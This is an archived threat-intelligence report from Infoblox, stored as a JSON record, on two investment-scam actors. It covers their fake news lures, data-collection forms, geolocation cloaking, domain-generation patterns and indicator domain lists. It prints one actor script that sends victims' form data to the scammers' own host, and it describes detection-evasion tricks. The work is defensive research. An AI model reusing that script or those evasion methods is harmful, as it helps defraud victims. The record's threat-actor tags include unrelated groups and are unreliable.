{ "id": "f263fca7-9f45-4710-9286-a2367712f145", "created_at": "2026-04-06T00:13:48.036827Z", "updated_at": "2026-04-10T03:35:21.357367Z", "deleted_at": null, "sha1_hash": "e13581982de826d8fe2725be39118277a7e65c6c", "title": "Uncovering Actor TTP Patterns and the Role of DNS in Investment Scams | Infoblox", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 7213037, "plain_text": "Uncovering Actor TTP Patterns and the Role of DNS in Investment\r\nScams | Infoblox\r\nBy Infoblox Threat Intel\r\nPublished: 2025-04-28 · Archived: 2026-04-05 13:30:42 UTC\r\nAuthors: Darby Wise, Piotr Glaska, Laura da Rocha\r\nAccording to the Federal Trade Commission (FTC), consumers lost more money to investment scams than any other kind in\r\n2024. This equates to a 24 percent increase from 2023 to 2024 in the amount of money lost—a total of US$5.7 billion1.\r\nThese threats take a variety of forms, including the so-called pig butchering scams, which generally start with generic text\r\nmessages to ones advertised through social media. Sometimes human interaction is involved and sometimes it is not. We\r\ntrack several investment scam actors and we’ve previously published research on two of them, Savvy Seahorse and Horrid\r\nHawk, who have distinctive DNS fingerprints.\r\nThis report expands on our previous publications to consider common techniques, tactics, and procedures (TTPs) of several\r\ninvestment scam actors who lure victims with fake platforms, including crypto exchanges. Fake websites referred to as\r\n“profit platforms” are designed to convince users they are dealing with a legitimate business. We’ve found that the actors\r\noften:\r\nRegister large numbers of domains algorithmically over time, a technique we refer to as registered domain generation\r\nalgorithms (RDGAs)\r\nEmbed similar web forms to collect user data\r\nHide their activity through traffic distribution systems (TDS)\r\nLeverage fake news often featuring spoofed government endorsements, a celebrity, or fake first-hand accounts of the\r\ninvestment program\r\nShare website structure indicative of the use of a kit\r\nWe are often able to discover and track investment scams through DNS fingerprints. Two of the actors detailed in this paper,\r\nwho we call Reckless Rabbit and Ruthless Rabbit, for example, are tracked through their use of RDGAs.\r\nEmbedded Web Forms\r\nWhile the actors we investigated may use different means to distribute their campaigns, we found that all of them include, at\r\nsome stage, an embedded web form, which we identified as the first and most notable TTP pattern. For example, Reckless\r\nRabbit creates ads on Facebook that lead to fake news articles featuring a celebrity endorsement for the investment platform.\r\nThe article includes a link to the scam platform which contains an embedded web form persuading the user to enter their\r\npersonal information to “register” for the investment opportunity.\r\nThe form typically requires the user’s first and last name, email address, and phone number, which automatically formats the\r\ncountry code to match the user’s IP geolocation. Some forms also require the user to create a password and offer the option\r\nto auto-generate one for them. Figure 1 below shows an example from a February 2025 scam where we accessed the landing\r\npage using a U.S.-based IP address; Figure 2 shows the auto-generated password. The actor uses this information to progress\r\nto the next step in the scam—information validation checks.\r\nhttps://blogs.infoblox.com/threat-intelligence/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams/\r\nPage 1 of 18\n\nFigure 1. Example of embedded web form in a February 2025 investment scam2\r\nhttps://blogs.infoblox.com/threat-intelligence/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams/\r\nPage 2 of 18\n\nFigure 2. Embedded web form with an auto-generated password field3\r\nValidation Checks\r\nOnce the user enters their personal details, most of the campaigns conduct validation checks on the user’s information and\r\ntheir IP address. The checks each actor performs can vary, but common ones include:\r\nValidity of the user’s email and/or phone number\r\nDuplication of emails and/or phone numbers\r\nMultiple attempts to register using the same IP address within a specific timeframe\r\nMissing information (name, phone number, etc.)\r\nThe scam actors often perform HTTP GET requests to legitimate IP validation tools, such as ipinfo[.]io, ipgeolocation[.]io,\r\nor ipapi[.]co. They use these validation checks to filter out traffic from specific countries, security researchers, and/or bots.\r\nIn many campaigns, if a user passes the validation, a TDS routes them either directly to the investment scam platform where\r\nthey are encouraged to transfer money, or to a page that thanks them for registering and says a representative will contact\r\nthem with additional information. Some campaigns use call centers to provide the victims with instructions on how to set up\r\nan account and transfer money into the fake investment platform. For users who do not pass the validation step, many\r\ncampaigns will simply display a “thank you” landing page, as shown in Figure 3.\r\nhttps://blogs.infoblox.com/threat-intelligence/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams/\r\nPage 3 of 18\n\nFigure 3. Ruthless Rabbit’s “thank you” page4\r\nTraffic Distribution Systems\r\nSome of the scam actors we’ve researched leverage their own TDSs to collect information about the victim and\r\nconditionally make decisions on which web content the user will be redirected to. This is the case for an active crypto scam\r\nactor we have been tracking that utilizes a TDS to route users from different countries to different fake investment platforms.\r\nTable 1 below shows this actor’s TDS redirections based on the geolocation of the user accessing the crypto scam page\r\nbitcoin-profit[.]org. This threat actor routes users from the United States to the legitimate platform eToro, possibly to evade\r\ndetection from security researchers.\r\nIP Geolocation TDS Domain(s) Investment Platform Domain\r\nSwitzerland5 mykryplogin[.]com -\u003e murzasanny[.]com trading[.]nexperts[.]pro\r\nCanada6 powapi[.]net primeassets[.]uk\r\nAustralia7 powapi[.]net –\u003e camersyf[.]com trading[.]xptraders[.]com\r\nUnited States8 cryptoveteran[.]care etoro[.]com (legitimate)\r\nTable 1. TDS and redirection domains for a crypto scam campaign. Users accessing bitcoin-profit[.]org from\r\nSwitzerland and Australia redirect to a secondary TDS domain.\r\nRDGAs and Dynamic Website Logos\r\nIn a previous blog we published in 2023, we introduced the concept of RDGAs:\r\nRegistered domain generation algorithms (RDGAs) are a programmatic mechanism that allows actors to create many\r\ndomain names at once or over time to register for use in their infrastructure. These differ from traditional domain\r\ngeneration algorithms (DGAs) that have long been associated with malware in significant ways. In an RDGA, the algorithm\r\nis a secret kept by the actor, and they register all the domain names. In a traditional DGA, the malware contains an\r\nalgorithm that can be discovered, and most of the domain names will not be registered. While DGAs are used exclusively for\r\nconnection to a malware controller, malicious RDGAs are used for a wide range of malicious activity.9\r\nSince then, we’ve observed over 3 million RDGA domains on the internet. These domains are commonly used in\r\nadvertising, so seeing these investment scams intermingled with other product ads makes sense. In the actor-specific\r\nsections of this paper below, we will show the distinct RDGA patterns that Reckless and Ruthless Rabbits use to create large\r\nsets of domains for their campaigns.\r\nSome actors use dictionary-based RDGAs to generate domain names that match dynamic website names and logos in their\r\nscam pages. Each website contains an embedded web form for the user to provide their information. As an example, Figure\r\n4 below shows that the top left corners of the scam websites display the supposed logo of the investment\r\nplatform/application, matching the domain name. The different pages displayed in Figure 4 have the same or very similar\r\ncontent, but the logo varies depending on the domain name. Scammers leverage the RDGAs to create large sets of domains,\r\nwhich they in turn use to automatically update the logo accordingly, to scale their campaigns.\r\nOther patterns we have seen threat actors use in most of the investment scam campaigns include:\r\nDistributing scam domains through malicious Facebook ads\r\nPromising high returns if a user inputs a small amount of money during registration\r\nPredominantly targeting users in Eastern European countries, such as Russia, Romania, Poland, etc.\r\nExcluding traffic from certain countries\r\nhttps://blogs.infoblox.com/threat-intelligence/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams/\r\nPage 4 of 18\n\nInvestment Threat Actors\r\nAs we mentioned at the beginning of the paper, two of the more notable investment scam actors that we are tracking are\r\nReckless and Ruthless Rabbits. They follow many of the common TTPs we’ve described above, but they also have their\r\nown distinguishing characteristics.\r\nReckless Rabbit\r\nReckless Rabbit lures victims into fake investment scams through malicious Facebook advertisements. They intersperse\r\nthem among other content, most commonly items for sale on popular marketplace stores such as Amazon (see Figure 5).\r\nThis technique of burying their investment scam ads among other, seemingly innocuous ads may be a trick they use to avoid\r\npolicy enforcement from Facebook.\r\nFigure 5: Reckless Rabbit’s Facebook ads for products on Amazon\r\nThe main scam advertisements take the user to either:\r\npages such as a full fake news story, which includes a link to the investment landing page (Figure 6), or\r\nthe investment platform itself (Figure 7).\r\nhttps://blogs.infoblox.com/threat-intelligence/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams/\r\nPage 5 of 18\n\nFigure 6: Website with fake news about a Polish celebrity and the investment scam lure at the end of the article. These are\r\nboth translated from the original page in Polish. The celebrity’s image and name have been redacted for the purpose of this\r\npaper.\r\nhttps://blogs.infoblox.com/threat-intelligence/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams/\r\nPage 6 of 18\n\nFigure 7: Reckless Rabbit’s investment scam platform in Norwegian and the translation to English. The site contains a web\r\nform similar to other investment scam actors13 and a fake endorsement from a Norwegian billionaire businessman.\r\nReckless Rabbit has been creating domains since as early as April 2024, with new domains created on a near-daily basis.\r\nTable 2 shows examples of the two RDGA patterns they use to create these domains. The first involves random characters, a\r\nthree-letter month abbreviation, an English word, and is in the .info TLD. The second pattern combines two or three English\r\nwords, which may or may not be separated by a dash. The domains in this group are in the .com and .info TLDs.\r\nDomain Pattern Examples\r\n\u003c1-2 random characters\u003e\u003c3 letter month\u003e\u003cshort English word\u003e[.]info kcfebdrill[.]info\r\nalmarsilk[.]info\r\niaprwall[.]info\r\nwmaycurr[.]info\r\nfjunmedi[.]info\r\nfjulswap[.]info\r\nhttps://blogs.infoblox.com/threat-intelligence/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams/\r\nPage 7 of 18\n\nDomain Pattern Examples\r\nfaugswap[.]info\r\nssepcoin[.]info\r\nkoctice[.]info\r\nlnovchalk[.]info\r\nqpdecbid[.]info\r\n\u003c2-3 random English words separated by dashes or not\u003e[.]\u003ccom, info\u003e\r\nwell-groomedcanvas[.]com\r\nupkeep-vocal[.]com\r\nextra-largewrinkles[.]info\r\nport-rusty-time[.]com\r\nlibrary-novel-axe[.]com\r\nacoustic-fund-rate[.]info\r\ntemple-well-known[.]info\r\nroomyspeedboat[.]info\r\nlongmarble[.]info\r\nsixcrowd[.]com\r\nmercifulknife[.]com\r\nTable 2: Reckless Rabbit’s RDGA domain patterns and examples\r\nWhen the victim accesses the fake news website, the actor collects information about the user, such as IP address and\r\ngeolocation, to determine the language that will be displayed on the page. They use the metadata as input to make a call to\r\nan API endpoint they maintain (/api/v1/trigger/field/) to fetch and display the site content appropriately. Figure 8 shows a\r\ncode snippet of one of the scripts called in the HTTP request chain and includes the API call.\r\nFigure 8. Code snippet of scripts that make an API call to get the language and the page to which the user will get\r\nredirected14, 15\r\nWe’ve observed instances where Reckless Rabbit uses validation checks to filter out traffic from specific countries,\r\nincluding Afghanistan, Somalia, Liberia, Madagascar, and others. The code snippet in Figure 9 shows the full list of\r\nexcluded countries.\r\nFigure 9: Code snippet that shows a variable for countries to be excluded16, 17\r\nReckless Rabbit configures wildcard DNS responses to their domains, which means that a query to any subdomain (e.g.,\r\nwildcardbdidbanpdla[.]brilliantwallaby[.]info) of their domains will return a response, as shown in Figure 10. Wildcarding\r\ngenerates noise in DNS because it means anyone can make a query to any subdomains for that SLD, and the subdomains\r\nwill return responses. This makes it difficult to determine which subdomains are actively being used by an actor, and which\r\nsubdomains are random queries triggered by, for example, security researchers. In this case, security tools may not add the\r\nhttps://blogs.infoblox.com/threat-intelligence/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams/\r\nPage 8 of 18\n\nSLD to their feeds and instead only add the subdomains that were confirmed to contain malicious content, thereby helping\r\nthe actor to use their domains longer.\r\nFigure 10. Wildcard response behavior to a random subdomain of an existent Reckless Rabbit domain\r\nReckless Rabbit uses several additional techniques to avoid detection, including:\r\nInterspersing ads that redirect to the investment scam between ads for items supposedly being sold on popular\r\nmarketplaces, such as Amazon (Figure 11)\r\nAdding unrelated images to avoid detection based on image recognition (Figure 12)\r\nDisplaying (in the ad) a decoy domain that is different from the domain that the user will be redirected to once they\r\nclick on the link (Figure 13)\r\nUsing a decoy page with non-suspicious content—such as a website for a restaurant—on the SLD, shielding the\r\nactual investment scam page hosted on the full URL (Figure 14)\r\nhttps://blogs.infoblox.com/threat-intelligence/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams/\r\nPage 9 of 18\n\nFigure 11. Investment scam lure mixed with items being sold in marketplaces\r\nhttps://blogs.infoblox.com/threat-intelligence/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams/\r\nPage 10 of 18\n\nFigure 12. Technique to prevent detection by image recognition-based security technology\r\nhttps://blogs.infoblox.com/threat-intelligence/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams/\r\nPage 11 of 18\n\nFigure 13. Example of Facebook ad caption with decoy domain, amazon[.]pl. The ad redirects to a URL under tyxarai[.]org\r\nand is associated to wjulbucks[.]info18, 19\r\nhttps://blogs.infoblox.com/threat-intelligence/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams/\r\nPage 12 of 18\n\nFigure 14. Decoy page with non-suspicious content on the SLD20\r\nRuthless Rabbit\r\nRuthless Rabbit has been running investment scam campaigns since at least November 2022. These campaigns follow\r\nsimilar themes to those we have seen from Horrid Hawk and other Russian-hosted scam campaigns that primarily target\r\nusers in Russia, Poland, Romania, and Kazakhstan, among other countries. Most current active campaigns are hosted on two\r\ndedicated IPs, but the actor has previously used at least eight different IPs hosted with Aeza, as well as a dedicated IP hosted\r\nwith IROKO. Combined, these IPs host over 2,600 actor-owned domains. They use Namecheap for domain registration,\r\nname servers and mail servers.\r\nIn May 2024, Ruthless Rabbit began using a single RDGA pattern to create the large number of domains necessary to\r\noperate their scams (see Table 3).\r\nDomain Pattern Examples\r\n\u003crandom English word or 3-7 random characters\u003e\u003cbik, job, mot, lin, tyt, byk, bot, fat, pit, kot, etc.\u003e\r\n[.]pro\r\ntopsmot[.]pro\r\nsitemot[.]pro\r\nviserbik[.]pro\r\ngoaljob[.]pro\r\nsomajob[.]pro\r\nwasakot[.]pro\r\nTable 3. Ruthless Rabbit RDGA pattern and examples\r\nCampaign Themes\r\nIn February 2023, Ruthless Rabbit started hosting Baltic Pipe financial scam pages, a common theme used in investment\r\nscams targeting Eastern European users. Over time, they diversified the themes of their landing pages, to include scams\r\nspoofing WhatsApp, Google Finance, and Meta. The most prevalent campaign theme since May 2024 is a news article\r\nspoofing the Russian-language news website “Channel One” that claims users who sign up for the “GazInvest” platform will\r\nearn up to 300,000 Russian rubles. This page (see Figure 15), shares the common TTP patterns we mentioned above,\r\nincluding lures of high returns, an embedded web form, and IP geolocation tools for conducting validation checks.\r\nhttps://blogs.infoblox.com/threat-intelligence/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams/\r\nPage 13 of 18\n\nFigure 15. Landing page for the Russian GazInvest scam21\r\nThe actor hosts their scam landing pages on specific URL paths that change per campaign theme. They use a concealment\r\ntechnique of giving users who attempt to access the SLD alone rather than a URL—a typical move for security researchers\r\n—an HTTP 404 Not Found error. Table 4 shows examples of the URL paths for some of the most prevalent campaigns.\r\nWe’ve broken out the SLDs and the URL paths because the latter are what the actor changes every couple of months.\r\nCampaign Theme SLD URL Path\r\nJanuary 2025 – GazInvest Platform22 brudamot[.]pro /4YJ3LH?MPC_3=16k3ua14tff7k\r\nSeptember 2024 – GazInvest Platform23 dropbik[.]pro /lander/gazinvestgaz_4301/\r\nMarch 2025 – Spoofed Google Finance Page24 easyjob[.]pro /google_finance_79/\r\nDecember 2024 – Fake Russian News Site25 kinabik[.]pro /JF5vNK?MPC_3=2pgkm0e57koso\r\nTable 4. Examples of URL paths for different SLDs and campaigns\r\nWhat’s interesting about Ruthless Rabbit is that they operate their own cloaking service to perform validation checks; the\r\ncloaking service domain (mcraftdb[.]tech) hosts publicly available documentation for their API titled “Mcraft MediaCraft\r\nTech API.” The documentation (Figure 16) provides insight into some of the actor’s validation checks on “leads,” or users,\r\nwho enter personal information into the forms embedded in the investment scam pages. The cloaking service looks for users\r\nentering duplicate information or attempting to access the investment platform multiple times within the previous 20\r\nminutes using the same IP address. Users who do not pass the checks will be redirected to either a 404 Not Found error page\r\nor to another page on the SLD titled thanks.html, which states someone will contact them for additional information. Figure\r\n17 shows the form script the actor uses for this API call.\r\nhttps://blogs.infoblox.com/threat-intelligence/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams/\r\nPage 14 of 18\n\nFigure 16. API documentation for the actor’s validation API26\n$('form').submit(function (event){\n $(this).submit(false);\n event.preventDefault();\n event.stopPropagation();\n event.stopImmediatePropagation();\n if($('.iti__selected-dial-code').length){\n var prefix = $('.iti__selected-dial-code').html().slice(1)\n $(this).append(` `)\n }\n var host = `\u0026host=${$(location).attr('hostname')}`\n var url=`\u0026url=${$(location).attr('href')}`\n var so=`\u0026so=Google Finance`\n var args = host + url + so\n var search = location.search.substring(1);\n\n$.ajax({\n type: \"POST\",\n url: 'https://mcraftdb[.]tech/api/v1/submit/a6111ace-7304-4d9b-8dfe-9aafb7e9638e/' + \"?\" + search,\n data: $(this).serialize() + args,\n headers: $(this).headers,\n dataType: 'json',\n crossDomain: true,\n success: function (response) {\n if (response.status === true) {\n document.location.replace(response.data);\n } else {\n document.location.href = location.protocol + '//' + location.host + location.pathname.substring(0, location.pathna\n }\n },\n })\n var btn = $(this).find(':submit')\n\nbtn.prop('disabled', true)\n setTimeout(function () {\n btn.prop('disabled', false)\n },30000)\n})\nhttps://blogs.infoblox.com/threat-intelligence/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams/\nPage 15 of 18\n\nFigure 17. API call used by Ruthless Rabbit to perform validation checks on the user27\r\nInterestingly, none of the forms in these campaigns have a field to enter an email address, but the response examples in\r\nFigure 16 indicate an email is required. We discovered that embedded into the HTML code is a script with a function\r\ngenerateRandomEmail(), (see Figure 18), that generates a new email address in the hidden form field every time the page is\r\nrefreshed. This indicates that the actor may not actually use the phone number and email address to contact the user but\r\ninstead uses them only to perform the validation checks. Most of the campaigns do, however, perform checks on the user’s\r\nIP geolocation via ipgeolocation[.]io and ipinfo[.]io, two legitimate geolocation lookup tools.\r\nFigure 18. HTML code showing the generateRandomEmail() function\r\nUsers who pass the validation checks will be routed to some sort of investment platform where they will be prompted to\r\nenter their financial information to complete the registration for the investment program. After numerous tests, however, we\r\nwere unable to successfully reach that final step. Despite passing the validation checks for all personal details, including the\r\nIP geolocation and phone number, we still received a failed response stating, “Cant register lead, no more fallbacks\r\navailable;”. Oddly enough, there was no information on this type of response in the actor’s API documentation.\r\nThe Importance of DNS\r\nThreat actors operating these large-scale and increasingly sophisticated scams exploit DNS to help build and maintain their\r\ninfrastructure. Over the years, actor abuse of DNS mechanisms, such as RDGAs and TDSs, has been underreported in the\r\nsecurity community, despite being crucial to malicious campaigns.\r\nSome investment scam actors capitalize on malicious TDSs to operate their campaigns. A TDS enables threat actors to\r\nstrengthen their infrastructure, making it more resilient by providing the ability to hide malicious content from security\r\nresearchers and bots. For example, one actor we’ve been tracking uses an HTTP-based TDS to shield their malicious scam\r\nlanding pages. We show an instance of a redirection chain in their campaign in Figure 19. Only by tracking these TDSs\r\nthrough DNS are we able to detect and block the infrastructure at scale, before the redirections even occur.\r\nFigure 19. Redirection chain for an investment scam actor’s TDS28\r\nActors also take advantage of RDGAs to create large numbers of domains to use in their campaigns, which enables them to\r\nhide in plain sight and change out domains often. As we wrote last summer:\r\n“Scammers use RDGAs for the same reasons that other threat actors use them: their domains are frequently blocked or\r\ntaken down by service providers. Consequently, it’s advantageous for them to have a steady stream of new domains with\r\nwhich to execute their scams.”\r\nConclusion\r\nThere are so many RDGA domains created every day that it is impossible for human researchers to find and assess them all.\r\nThrough the lens of DNS, we are able to leverage automated detection and correlate these investment scam domains at scale.\r\nThreat actors like Reckless and Ruthless Rabbits will be relentless in their attempts to trick as many users as possible.\r\nBecause these types of scams have proven to be highly profitable for them, they will continue to grow rapidly—both in\r\nnumber and sophistication.\r\nIndicators of Activity\r\nIndicator Note\r\nmiddle.sturdypants[.]com\r\nbrilliantwallaby[.]info\r\nencouragingtax[.]info\r\ntyxarai[.]org\r\nIndicators used by Reckless Rabbit in investment scam campaigns\r\nhttps://blogs.infoblox.com/threat-intelligence/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams/\r\nPage 16 of 18\n\nIndicator Note\r\nupkeep-vocal[.]com\r\nextra-largewrinkles[.]info\r\nport-rusty-time[.]com\r\nlibrary-novel-axe[.]com\r\nacoustic-fund-rate[.]info\r\ntemple-well-known[.]info\r\nroomyspeedboat[.]info\r\nlongmarble[.]info\r\nsixcrowd[.]com\r\nmercifulknife[.]com\r\nwjulbucks[.]info\r\nkcfebdrill[.]info\r\nalmarsilk[.]info\r\niaprwall[.]info\r\nwmaycurr[.]info\r\nbmaypost[.]info\r\nfjunmedi[.]info\r\nfjulswap[.]info\r\nfaugswap[.]info\r\nssepcoin[.]info\r\nkoctice[.]info\r\nlnovchalk[.]info\r\nqpdecbid[.]info\r\nbortjob[.]pro\r\ntopsmot[.]pro\r\nsitemot[.]pro\r\nviserbik[.]pro\r\ngoaljob[.]pro\r\nsomajob[.]pro\r\nwasakot[.]pro\r\nbrudamot[.]pro\r\ndropbik[.]pro\r\neasyjob[.]pro\r\nkinabik[.]pro\r\nDomains used by Ruthless Rabbit in investment scam campaigns\r\nbitcoineverestai[.]app\r\nbitcoin-eprex[.]com\r\nechelonyieldai[.]app\r\neco-terra[.]app\r\neverix-edge[.]org\r\ngptifexai[.]com\r\nimmediatebitwave[.]app\r\nimmediateluminary[.]com\r\nimmediatemomentum[.]site\r\nquantumflash[.]org\r\nsolidreturn[.]app\r\nSample of domains used by an unnamed actor for investment scams\r\nvensotixapp-platform[.]store\r\nvasezonixapp[.]guru\r\nvensotixapp[.]click\r\nvenzotexapp[.]cloud\r\naportunex[.]app\r\naportunex-app[.]shop\r\naportunex-app[.]trade\r\naportunex-app[.]wiki\r\naportunexapp[.]top\r\naportunexapp[.]bond\r\naportunexapp[.]help\r\naportunexapp[.]trade\r\naportunexapp[.]wiki\r\nbitcoin-apex[.]guru\r\nSample of RDGA and registered DDGA domains used by an unnamed actor for\r\ninvestment scams\r\nhttps://blogs.infoblox.com/threat-intelligence/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams/\r\nPage 17 of 18\n\nIndicator Note\r\nbitcoin-apex[.]help\r\nbitcoin-apex[.]website\r\nbitcoinapex-platform[.]click\r\nbitcoinapex-platform[.]guru\r\nbitcoinapex-platform[.]top\r\nbitcoinapex[.]website\r\nFootnotes\r\n1. https://www.ftc.gov/news-events/news/press-releases/2025/03/new-ftc-data-show-big-jump-reported-losses-fraud-125-billion-2024\r\n2. https://urlscan.io/result/f217e772-6deb-4cbc-88fd-b6b46363494e\r\n3. https://urlscan.io/result/0195f7b6-1cda-77ce-aadd-22dda511aa0e\r\n4. https://urlscan.io/result/aca53e46-291b-46bd-bc67-76179d82c20a/\r\n5. https://urlscan.io/result/0195d87a-5ee5-7228-b6e3-c1968ffc562b/\r\n6. https://urlscan.io/result/0195ce8b-6b4e-7770-b8d5-cea621d1b835/\r\n7. https://urlscan.io/result/0195ce8e-3549-700b-addc-64a4879a5ef2/\r\n8. https://urlscan.io/result/0195fd9d-9679-736a-8652-99397922991a/\r\n9. https://insights.infoblox.com/resources-research-report/infoblox-research-report-registered-dgas-the-prolific-new-menace-no-one-is-talking-about\r\n10. https://urlscan.io/result/0ba64979-2186-44ed-858e-51f030c9651b/\r\n11. https://urlscan.io/result/4859f1d7-d337-4f5e-bfb0-e3a8d677a77b/\r\n12. https://urlscan.io/result/567a05cb-cae2-4937-a326-2f314c289720/\r\n13. https://urlscan.io/result/924de331-a6ff-45f7-a4cc-cb13ca93f23f/\r\n14. https://urlscan.io/result/3f999960-0b0f-4cfe-96ae-78cebca95290/#transactions\r\n15. https://urlscan.io/responses/23fb5db0618f6a48381978574a34168554a6ecd14f7d21a1d754d27a8ca4eea8/\r\n16. https://urlscan.io/result/924de331-a6ff-45f7-a4cc-cb13ca93f23f/#transactions\r\n17. https://urlscan.io/responses/7402355aa0d7eb0248bf6fdfb572a43e6457e5c1b26719147464ea224e5009a7/\r\n18. https://urlscan.io/result/01956c44-fe9a-7113-a0c8-f025f9d4dc9e\r\n19. https://urlscan.io/result/01956c44-fe9a-7113-a0c8-f025f9d4dc9e#links\r\n20. https://urlscan.io/result/019585ef-23c0-7000-bdaf-babc56433b08\r\n21. https://urlscan.io/result/01958f39-aa3e-7001-ab7d-fbe0e3bab026\r\n22. https://urlscan.io/result/8c5fe52a-e2c3-4300-8a84-320d79e878da/\r\n23. https://urlscan.io/result/5c149a21-977b-4cf7-ae02-7095bf8ac54d/\r\n24. https://urlscan.io/result/fe9b35b4-910d-40a5-8edb-e0babdf75740/\r\n25. https://urlscan.io/result/f90ad3c0-a347-4272-abba-d4e2357c3cb6/\r\n26. https://urlscan.io/result/f1273504-36df-4db5-9a7f-2532594d0d04/\r\n27. https://urlscan.io/responses/7b3001eef10d518496867654ec76e4f3c6c33550d7a67780ce0440a4c28b5b50/\r\n28. https://urlscan.io/result/85e9ce2c-92f5-48ba-8dfd-ed47d63a9eca/#redirects\r\nSource: https://blogs.infoblox.com/threat-intelligence/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams/\r\nhttps://blogs.infoblox.com/threat-intelligence/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams/\r\nPage 18 of 18\n\nhttps://blogs.infoblox.com/threat-intelligence/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams/ \nFigure 1. Example of embedded web form in a February 2025 investment scam2\n Page 2 of 18\n\nhttps://blogs.infoblox.com/threat-intelligence/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams/ \nFigure 6: Website with fake news about a Polish celebrity and the investment scam lure at the end of the article. These are\nboth translated from the original page in Polish. The celebrity’s image and name have been redacted for the purpose of this\npaper. \n Page 6 of 18 \n\nhttps://blogs.infoblox.com/threat-intelligence/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams/ \nFigure 11. Investment scam lure mixed with items being sold in marketplaces\n Page 10 of 18", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia" ], "references": [ "https://blogs.infoblox.com/threat-intelligence/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams/" ], "report_names": [ "uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams" ], "threat_actors": [ { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "2864e40a-f233-4618-ac61-b03760a41cbb", "created_at": "2023-12-01T02:02:34.272108Z", "updated_at": "2026-04-10T02:00:04.97558Z", "deleted_at": null, "main_name": "WildCard", "aliases": [], "source_name": "ETDA:WildCard", "tools": [ "RustDown", "SysJoker" ], "source_id": "ETDA", "reports": null }, { "id": "617fa30e-d51c-425e-b084-6e60fd200993", "created_at": "2025-05-29T02:00:03.211485Z", "updated_at": "2026-04-10T02:00:03.86555Z", "deleted_at": null, "main_name": "Reckless Rabbit", "aliases": [], "source_name": "MISPGALAXY:Reckless Rabbit", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "18272df8-d6de-40f5-a587-66e8e5b48618", "created_at": "2025-05-29T02:00:03.212805Z", "updated_at": "2026-04-10T02:00:03.866583Z", "deleted_at": null, "main_name": "Ruthless Rabbit", "aliases": [], "source_name": "MISPGALAXY:Ruthless Rabbit", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "91e5f048-9ff0-4538-a7d3-85fae0e92118", "created_at": "2023-01-06T13:46:38.811091Z", "updated_at": "2026-04-10T02:00:03.109117Z", "deleted_at": null, "main_name": "Unnamed Actor", "aliases": [], "source_name": "MISPGALAXY:Unnamed Actor", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "256a6a2d-e8a2-4497-b399-628a7fad4b3e", "created_at": "2023-11-30T02:00:07.299845Z", "updated_at": "2026-04-10T02:00:03.484788Z", "deleted_at": null, "main_name": "WildCard", "aliases": [], "source_name": "MISPGALAXY:WildCard", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434428, "ts_updated_at": 1775792121, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/e13581982de826d8fe2725be39118277a7e65c6c.pdf", "text": "https://archive.orkl.eu/e13581982de826d8fe2725be39118277a7e65c6c.txt", "img": "https://archive.orkl.eu/e13581982de826d8fe2725be39118277a7e65c6c.jpg" } }